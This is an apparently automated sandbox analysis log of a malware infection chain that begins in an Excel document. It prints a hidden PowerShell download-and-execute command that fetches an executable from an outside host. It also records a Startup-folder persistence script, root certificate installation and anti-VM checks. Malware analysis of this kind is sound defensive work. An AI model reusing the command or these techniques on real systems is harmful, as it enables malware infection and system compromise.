Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;			Jump to behavior

Source: Yara match	File source: 5.2.tmp667.exe.48b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_004242E0 push AC005BFAh; retf		5_2_004244BD
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00424340 push AC005BFAh; retf		5_2_004244BD
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00601247 pushfd ; retf		5_2_00601255
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D4B48 pushfd ; retf		5_2_006D4B49
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D58AB9 push 8C00440Dh; retf		5_2_00D58AC5
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D535F0 push ecx; retf		5_2_00D535F6
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_00D5363B push es; retf		5_2_00D53641
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_054035A6 push edi; retf		5_2_054035AC
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_008E42E0 push 64006FCFh; retf		8_2_008E43FD
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C2FA89 pushfd ; retf		8_2_00C2FA95
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C2554C push ss; ret		8_2_00C2554D
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_00C44B48 pushfd ; retf		8_2_00C44B49
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_043235F0 push ecx; retf		8_2_043235F6
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_0432363B push es; retf		8_2_04323641
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_04328AB9 push 8C009E0Dh; retf		8_2_04328AC5
Source: C:\Users\user\AppData\Roaming\svcost.exe	Code function: 8_2_054035A6 push edi; retf		8_2_054035AC

Source: tmp667.exe.2.dr	Static PE information: section name: .text entropy: 7.764858525500812
Source: svcost.exe.5.dr	Static PE information: section name: .text entropy: 7.764858525500812

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	File created: C:\Users\user\AppData\Roaming\svcost.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\tmp667.exe			Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 1C0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 2690000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 5F0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 5450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 15450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 310000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 2310000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 940000 memory reserve | memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4761			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2327			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3828	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3832	Thread sleep count: 218 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3840	Thread sleep count: 173 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4016	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4024	Thread sleep count: 198 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4032	Thread sleep count: 100 > 30			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\			Jump to behavior

Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft|VMWare|Virtual

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

